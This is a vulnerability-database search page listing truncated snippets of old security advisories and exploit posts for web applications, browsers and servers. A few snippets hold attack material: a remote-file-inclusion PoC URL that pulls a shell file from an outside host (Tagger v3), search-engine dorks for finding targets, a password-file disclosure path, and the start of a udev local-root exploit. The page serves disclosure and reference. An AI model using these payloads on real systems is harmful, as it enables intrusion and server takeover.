Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2005/12/17 12:0 a.m.550 views

exploit (html) for Advanced Guestbook 2.2

In GOD We Trust; Kachal667 Under9round Team KuT new exploit with HTML for Advanced Guestbook 2.2 . This bug found by BHST. Coded By Hessam-x Note : For use this exploit first change target to victim example : www.targetsite.com/guestbook/admin.php =====HTML CODE : html titleGuestBook 2.2...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2007/10/28 12:0 a.m.548 views

Micro Login System v1.0 (userpwd.txt) Password Disclosure Vulnerability

Micro Login System v1.0 userpwd.txt Password Disclosure Vulnerability Affected Software: Micro Login System v1.0 Download: http://www.hotscripts.com/jump.php?listingid=67504&jumptype=1 Bugfounder: 0x90 Contact: Gunsat0x90dotcomdotar homepage: WwW.0x90.CoM.Ar +Exploit: http://target/path/userpwd.t...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2004/09/28 12:0 a.m.546 views

@lex Guestbook (PHP) Include file

Informations : °°°°°°°°°°°°°° Website : http://www.alexphpteam.com Version : all Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° ./include/livreinclude.php ------------------------------------------------------------------ if !$noconnect.... some include functions...

1AI score
Exploits0
securityvulns
securityvulns
added 2000/07/01 12:0 a.m.540 views

vpopmail-3.4.11 problems

The vpopmail package is an extension for Qmail that allows easy management of virtual domains and can use a SQL backend for storing user accounts. The program vchkpw in that package contains a vulnerability in its logging routines. The vchkpw program handles the username/password/domain...

Exploits0
securityvulns
securityvulns
added 2014/06/14 12:0 a.m.535 views

[KIS-2014-07] Dotclear <= 2.6.2 (categories.php) SQL Injection Vulnerability

-------------------------------------------------------------- Dotclear = 2.6.2 categories.php SQL Injection Vulnerability -------------------------------------------------------------- - Software Link: http://dotclear.org/ - Affected Versions: Version 2.6.2 and probably prior versions. -...

6CVSS0.8AI score0.01665EPSS
Exploits2
securityvulns
securityvulns
added 2008/06/09 12:0 a.m.535 views

PixelPost 1.7.1 File Disclosure

PixelPost 1.7.1 File Disclosure by Charles "real" F. charlesfolathotmail.fr http://realn.free.fr Requires registerglobals = On magicquotesgpc = Off PROOF OF CONCEPT TARGET URL: http://url/addons/copyfolder.php?...

7AI score
Exploits0
securityvulns
securityvulns
added 2005/03/17 12:0 a.m.532 views

[SA14600] PHPOpenChat "sourcedir" File Inclusion Vulnerability

---------------------------------------------------------------------- Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=l...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2004/10/18 12:0 a.m.532 views

[SA12858] YaPiG comments Cross-Site Scripting Vulnerability

TITLE: YaPiG comments Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA12858 VERIFY ADVISORY: http://secunia.com/advisories/12858/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: YaPiG 0.x http://secunia.com/product/3795/ DESCRIPTION: A vulnerability has...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2006/07/02 12:0 a.m.529 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

1.5AI score
Exploits0References10Affected Software10
securityvulns
securityvulns
added 2013/09/09 12:0 a.m.528 views

VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability

========================================================================================== VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability ==========================================================================================...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2006/09/14 12:0 a.m.526 views

Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Mambo comserverstat Component =0.4.4 Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron turkish hacker +...

1.3AI score
Exploits0
securityvulns
securityvulns
added 2010/02/05 12:0 a.m.524 views

[MajorSecurity Advisory #64]Apple Safari 4.0.4 Denial of Service

MajorSecurity Advisory 64Apple Safari 4.0.4 Denial of Service Details ============ Product: Apple Safari Webbrowser Security-Risk: low Remote-Exploit: yes Vendor-URL: http://www.apple.com/safari/ Vendor-Status: informed Advisory-Status: published on 02-02-2010 Credits ============ Discovered by:...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2004/06/09 12:0 a.m.524 views

[Full-Disclosure] iDEFENSE Security Advisory 06.08.04: Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability

Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability iDEFENSE Security Advisory 06.08.04 www.idefense.com/application/poi/display?id=107&type=vulnerabilities June 8, 2004 I. BACKGROUND Squid is a fully-featured Web Proxy Cache designed to run on Unix systems and supports...

10CVSS0.3AI score0.7107EPSS
Exploits6
securityvulns
securityvulns
added 2007/04/30 12:0 a.m.522 views

firefly 1.1.01 <= Remote File Include Vulnerablitiy

firefly 1.1.01 = Remote File Include Vulnerablitiy D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz Discovered by: Alkomandoz Hacker Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com ====================================...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/09/07 12:0 a.m.522 views

WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit

World Defacers Team --------------------Summary---------------- eVuln ID: WD23 Vendor: phpopenchat-3.0. Vendor's Web Site: http://phpopenchat.org Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS wdzone.net & worlddefacers.de...

1.1AI score
Exploits0
securityvulns
securityvulns
added 2007/04/21 12:0 a.m.520 views

UseBB Version 1.0.4 Path Disclosure Vulnerability

netVigilance Security Advisory 16 UseBB Version 1.0.4 Path Disclosure Vulnerability Description: UseBB is an Open Source forum package developed in PHP and using the popular MySQL database back-end to store data. Unlike other popular forum systems, UseBB does not strive to have as many features a...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2000/06/10 12:0 a.m.520 views

OpenSSH's UseLogin option allows remote access with root privilege.

OpenSSH's UseLogin option allows remote access with root privilege. 1. Systems affected: The default installation of OpenSSH is not vulnerable, since UseLogin defaults to 'no'. However, if UseLogin is enabled, all versions of OpenSSH prior to 2.1.1 are affected. 2. Description: If the UseLogin...

1AI score
Exploits0
securityvulns
securityvulns
added 2012/11/18 12:0 a.m.513 views

XSS vulnerability in swfupload in WordPress

Hello 3APA3A! I will draw your attention to XSS vulnerability in swfupload in WordPress. In April there was announced Cross-Site Scripting vulnerability in swfupload.swf in WordPress CVE-2012-3414. It was fixed in WordPress 3.3.2. At that time there was no detailed information about it. Last week...

4.3CVSS4.9AI score0.09088EPSS
Exploits10
securityvulns
securityvulns
added 2006/06/02 12:0 a.m.512 views

ASP Discussion Forum Remote XSS Attack

Hi, I found a vulnerability in ASP Discussion Forum. The vulnerability is a Remote XSS Attack. This is the original Advisory: http://colander.altervista.org/advisory/ASPDisc.txt Let me know if you want to post it up or not. Best Regards, Omni -- Email.it, the professional e-mail, gratis per te:...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2008/01/17 12:0 a.m.510 views

RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit

Info: Software: RichStrong CMS HomePage: http://www.hzrich.cn Exploit: Remote Sql Injection High Where: showproduct.asp?cat= Bug Found By: Jose Luis Gуngora Fernбndez|JosS Contact: sys-projectathotmail.com Web: http://www.spanish-hackers.com Dork: "Power by:RichStrong CMS" Dork2: Priv8, xD! +...

Exploits0
securityvulns
securityvulns
added 2000/10/20 12:0 a.m.507 views

DoS in Intel corporation 'InBusiness eMail Station'

Intel corporation 'InBusiness eMail Station' firmware version 1.04.87 latest Denial of service vulnerability. Vendor notification date: 20/10-2000 Public notification date: 20/10-2000 Problem: I found a buffer overflow in the Intel InBusiness eMail Station, which can enable an attacker to execute...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2015/10/05 12:0 a.m.503 views

APPLE-SA-2015-09-16-2 Xcode 7.0

APPLE-SA-2015-09-16-2 Xcode 7.0 Xcode 7.0 is now available and addresses the following: DevTools Available for: OS X Yosemite v10.10.4 or later Impact: An attacker may be able to bypass access restrictions Description: An API issue existed in the apache configuration. This issue was addressed by...

7.5CVSS0.7AI score0.99999EPSS
Exploits8
securityvulns
securityvulns
added 2010/11/18 12:0 a.m.503 views

SQL Injection in CLANSPHERE

Vulnerability ID: HTB22694 Reference: http://www.htbridge.ch/advisory/sqlinjectioninclansphere.html Product: CLANSPHERE Vendor: csphere.eu http://www.csphere.eu/ Vulnerable Version: 2010.0 Final Vendor Notification: 02 November 2010 Vulnerability Type: SQL Injection Status: Fixed by Vendor Risk...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2010/08/03 12:0 a.m.503 views

Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)

Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution 2286198 Published: August 02, 2010 Version: 1.0 General Information Executive Summary This security update resolves a publicly disclosed vulnerability in Windows Shell. The vulnerabili...

9.3CVSS1.7AI score0.91324EPSS
Exploits13
securityvulns
securityvulns
added 2012/09/03 12:0 a.m.493 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

9.4CVSS1.6AI score0.52928EPSS
Exploits25References43Affected Software34
securityvulns
securityvulns
added 2012/04/02 12:0 a.m.490 views

CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: libraptor - XXE in RDF/XML File Interpretation Release Date: 2012-03-24 Applications: libraptor / librdf...

4.3CVSS0.13682EPSS
Exploits2
securityvulns
securityvulns
added 2015/07/20 12:0 a.m.484 views

[slackware-security] httpd (SSA:2015-198-01)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security httpd SSA:2015-198-01 New httpd packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...

5CVSS6.2AI score0.73327EPSS
Exploits0
securityvulns
securityvulns
added 2009/11/09 12:0 a.m.484 views

[SECURITY] CVE-2009-3548 Apache Tomcat Windows Installer insecure default administrative password

CVE-2009-3548: Apache Tomcat Windows Installer insecure default administrative password Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.0 to 5.5.28 Tomcat 6.0.0 to 6.0.20 The unsupported Tomcat 3.x, 4.0.x, 4.1.x and 5.0.x versions may be also affected...

7.5CVSS0.3AI score0.78995EPSS
Exploits10
securityvulns
securityvulns
added 2007/10/04 12:0 a.m.484 views

Multiple FPS game servers buffer overflow with PunkBuster

Buffer overflow on oversized packet if PunkBuster protection is turned on...

5.1AI score
Exploits0References3Affected Software3
securityvulns
securityvulns
added 2007/02/25 12:0 a.m.484 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.8CVSS1.5AI score0.05905EPSS
Exploits9References10Affected Software9
securityvulns
securityvulns
added 2013/07/16 12:0 a.m.478 views

[security bulletin] HPSBPV02891 rev.1 - HP ProCurve Switches, Remote Unauthorized Information Disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03819065 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03819065 Version: 1 HPSBPV02891 rev....

4.3CVSS0.3AI score0.03426EPSS
Exploits0
securityvulns
securityvulns
added 2003/01/08 12:0 a.m.477 views

Etherleak: Ethernet frame padding information leakage (A010603-1)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 @stake, Inc. www.atstake.com Security Advisory Advisory Name: Etherleak: Ethernet frame padding information leakage Release Date: 01/06/2003 Application: Ethernet device driver software Platform: Multiple Severity: Information disclosure Authors: Ofir...

5CVSS0.3AI score0.73006EPSS
Exploits15
securityvulns
securityvulns
added 2009/04/19 12:0 a.m.473 views

[Full-disclosure] udev exploit

!/bin/sh Linux 2.6 bug found by Sebastian Krahmer lame sploit using LD technique by kcope in 2009 tested on debian-etch,ubuntu,gentoo do a 'cat /proc/net/netlink' and set the first arg to this script to the pid of the netlink socket the pid is udevdpid - 1 most of the time + sploit has to be UNIX...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2012/12/18 12:0 a.m.470 views

Wordpress Pingback Port Scanner

Hi folks, Wordpress 3.5 has it's XML-RPC Interface enabled by default. See here for more information: http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/ http://codex.wordpress.org/Version3.5Settings I read through the article and took a look at the Pinback API sinc...

Exploits0
securityvulns
securityvulns
added 2007/03/25 12:0 a.m.470 views

Active Link Engine Remote SQL Injection Vulnerability

Title : Active Link Engine Remote SQL Injection Vulnerability Author : CyberGhost My Web Site : http://aspspider.org/cgsecurity Demo Page : http://www.activewebsoftwares.com/demoactivelinkengine Script Page : http://www.activewebsoftwares.com/productinfo.aspx?ProductID=7 Vuln. Username :...

2.1AI score
Exploits0
securityvulns
securityvulns
added 2000/04/26 12:0 a.m.467 views

piranha default password/exploit

Hi, In the interest of full disclosure I used an alias the last few times, let's see how this goes as me here are the details of the piranha vulnerability. RE: ISS Security Advisory iss.00-04-24.Piranha To summarize, piranha is a GUI tool for monitoring, configuring, and administering an LVS...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2014/10/27 12:0 a.m.464 views

OpenBSD DoS

System crash on ELF parsing...

2.5AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2014/05/02 12:0 a.m.464 views

[ANN][SECURITY] Struts 1 - CVE-2014-0114 -Mitigation Advice Available, Possible RCE Impact

As confirmed in our last announcement, the Apache Struts 1 framework in all versions is affected by a ClassLoader manipulation vulnerability CVE-2014-0114 similar to a recently fixed vulnerability in Struts 2 CVE-2014-0112, CVE-2014-0094 1. Thanks to the efforts of Alvaro Munoz and the HP Fortify...

7.5CVSS0.2AI score0.99614EPSS
Exploits8
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.464 views

Belkin WiFi NetCam video stream backdoor with unchangeable admin/admin credentials

Product: Product NetCam WiFi Camera With Night Vision, purchased August 2013 Summary: Live video stream is accessible with user/password of admin/admin. The user/password combination admin/admin cannot be changed by the user. This "feature" is undocumented. To reproduce: 1. Connect webcam to...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2011/12/05 12:0 a.m.458 views

Insecure RSA Encryption in jCryption, PEAR Crypt_RSA and Crypt_RSA2

SWITCH-CERT SECURITY ADVISORY ============================= Vulnerability: Insecure Implementation of RSA Encryption Affected Products: jCryption, PEAR CryptRSA, PEAR CryptRSA2 Advisory Date: 2011-11-30 Advisory Author: Daniel Roethlisberger, SWITCH-CERT Introduction Web applications using...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2011/09/20 12:0 a.m.458 views

XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke

Hello, Microsoft recently published MS11-074. This bulletin concerns mainly SharePoint 2007 and 2010 but CVE-2011-1892 applies too to Office Groove client and server, Office Forms Server 2007 and Office Web Apps 2010. The vulnerability is a "XML External Entity Reference" one, as described in...

4CVSS0.4AI score0.38332EPSS
Exploits6
securityvulns
securityvulns
added 2006/07/03 12:0 a.m.458 views

Excel 0day : Excel 2000/XP/2003 Style 0day POC

Excel 0day : Excel 2000/XP/2003 Style 0day POC POC http://www.hitcon.org/Nanika.xls Description: A vulnerability has been discovered in Microsoft Excel, which can be exploited by malicious people to compromise a user's system. Excel 2003 & XP EIP- 00xx00xx Click Repair Mode .......Exploit....:P...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2015/10/25 12:0 a.m.456 views

Apple Xcode multiple security vulnerabilities

Restrictions bypass, weak encryption, information discosure, multiple svn vulnerabilities...

7.5CVSS1.6AI score0.99999EPSS
Exploits8References2Affected Software1
securityvulns
securityvulns
added 2006/08/10 12:0 a.m.452 views

Tagger v3 <= BBCodeFile Remote file inclusion

Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE" inurl:tags.php Visit us :...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2003/07/14 12:0 a.m.451 views

CyberShop-ASP 6.0Fx Vulnerable with shopdbtest.asp

$Indonesia - Security Development Team 2000 - 2003 Advisory Name: CyberShop-ASP 6.0Fx Vulnerable with shopdbtest.asp Release Date: 3:41 PM 7/13/03 Application: CyberShop ASP 6.0Fx Platform: Win32 Severity: High BUG Type: Security leak Author: DrPonidi [email protected] Discover by:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2008/12/15 12:0 a.m.449 views

New vulnerabilities in CapCC for WordPress

Hello 3APA3A! I'm informing you about new vulnerabilities in WordPress plugin CapCC http://websecurity.com.ua/2688/. These are Insufficient Anti-automation, Cross-Site Request Forgery and SQL Injection vulnerabilities. Insufficient Anti-automation: This captcha vulnerable to half-automated method...

1.3AI score
Exploits0
securityvulns
securityvulns
added 2004/06/18 12:0 a.m.449 views

[UNIX] Pivot Remote Code Execution Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

8.2AI score
Exploits0
securityvulns
securityvulns
added 2006/06/09 12:0 a.m.448 views

Windows Software Restriction Policy Protection Bypass

Windows Software Restriction Policy Protection Bypass Class: Protection bypass Vector: Local Tested on: Windows XP SP2, Windows Server 2003 SP1 Risk: Low Remark: I don't know, what is it - bug or feature, but I can't find any documentation on this issue. Description: Software Restriction Policies...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2011/12/26 12:0 a.m.446 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

6.5CVSS1.6AI score0.02624EPSS
Exploits5References11Affected Software10
securityvulns
securityvulns
added 2005/08/16 12:0 a.m.446 views

Advanced Guestbook 2.3.3 upload image bug

TITLE: Advanced Guestbook 2.3.3 upload image error and maybe possible file inclusion! Severity: Well for now I haven't tested it completely but if not patched it may cause a remote command execution and file inclusion. SOFTWARE: Advanced Guestbook 2.3.3 http://www.proxy2.de/ DESCRIPTION: At the...

7.4AI score
Exploits0
Total number of security vulnerabilities5000